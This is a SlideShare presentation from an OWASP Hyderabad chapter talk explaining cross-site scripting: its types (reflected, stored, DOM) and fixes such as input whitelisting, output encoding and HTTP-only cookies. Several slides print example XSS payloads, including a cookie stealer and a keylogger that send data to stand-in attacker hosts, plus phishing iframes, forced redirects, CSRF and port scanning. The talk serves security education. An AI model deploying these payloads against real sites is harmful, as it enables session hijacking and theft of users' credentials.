Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Cross site scripting attacks and defenses

16,994 views

Published on

This presentation covers the Cross site scripting attacks and defences in web applications, this talk was delivered as part of OWASP Hyderabad Chapter meet. Comments and suggestions are welcome.

Published in: Technology

Cross site scripting attacks and defenses

  1. 1. `XSS MultiFacetVulnerability
  2. 2. #whoamiMohammed Imran ( @imran_naseem )Information Security professional @ TCSNull Hyderabad Chapter LeadOWASP Hyderabad Board Member
  3. 3. Agenda1321 4Cross Site ScriptingProblemAnatomy of XSSTypes of XSS5 XSS Attacks6 Solution
  4. 4. `#1The definitionof XSS
  5. 5. Cross site Scripting (XSS) attacks are a type ofinjection problem, in which malicious scripts areinjected into otherwise benign and trusted websites.“”Source:owasp.org
  6. 6. `#2The Problemof XSS
  7. 7. And its Expected ...
  8. 8. If not done securely, couldlead to problems
  9. 9. Such as...Malicious Script ExecutionPhishingRedirection to malicious siteSession HijackingCSRFKeyloggingPort Scanning
  10. 10. `#3The Anatomyof XSS
  11. 11. Application takes insecurecontent
  12. 12. HTML Source Code
  13. 13. `#4The Typesof XSS
  14. 14. Reflected XSS
  15. 15. Reflected attack generally is used to exploit scriptinjection vulnerabilities via URL in a web application.“”
  16. 16. Stored XSS
  17. 17. Stored XSS occurs when the injected script is storedin the database and is delivered to the visitor of theapplication.“”
  18. 18. DOM XSS
  19. 19. DOM Based XSS is an XSS attack wherein the attackpayload is executed as a result of modifying theDOM “environment” in the victim’s browser used bythe original client side script, so that the client sidecode runs in an “unexpected” manner.“”Source:owasp.org
  20. 20. `#5The AttackTypes in XSS
  21. 21. Redirection“><script>document.location.href=”http://www.MaliciousSite.com/” </script>
  22. 22. Session Hijacking“><script>document.location.href=”http://www.MaliciousSite.com/cookiestealer.php?cookie=”+document.cookie </script>
  23. 23. Phishing“><iframe src="http://www.yourphishingsite.com"height="100%" width="100%"></iframe>
  24. 24. keylogging“><script src=”http://www.MaliciousSite.com/keylogger.js”> </script>Logic:document.onkeypress = function keyLog(a) { newImage().src=http://www.attacker.com/logging.php?data=+a.which; }
  25. 25. REDIRECTION“><script>document.location.href=”http://www.MaliciousSite.com/” </script>
  26. 26. CSRFPage 1:<form name=”delete” action="http://yoursite.com/deleteuser"method="post"><input type="hidden" name="userid" value="1"><input type=”submit”></form>Page 2:“><script>document.form.delete.submit();</script>
  27. 27. Port Scanning<script type="text/javascript">function handleError(message, url, line){if(message.match(/Script error|Error loading script/)){alert("open");}}var newScript = document.createElement(script);newScript.src = http://www.google.com:80/;document.body.appendChild(newScript);window.onerror = handleError;</script>
  28. 28. `#6The Solutionto fix XSS
  29. 29. Solution● Validate the data ( use white-listing )● Encode the data● Use HTTP-only and secure flags for cookies
  30. 30. Credits● http://www.symantec.com/connect/blogs/getting-sassy● All icons are from http://thenounproject.com/● Owasp.org

×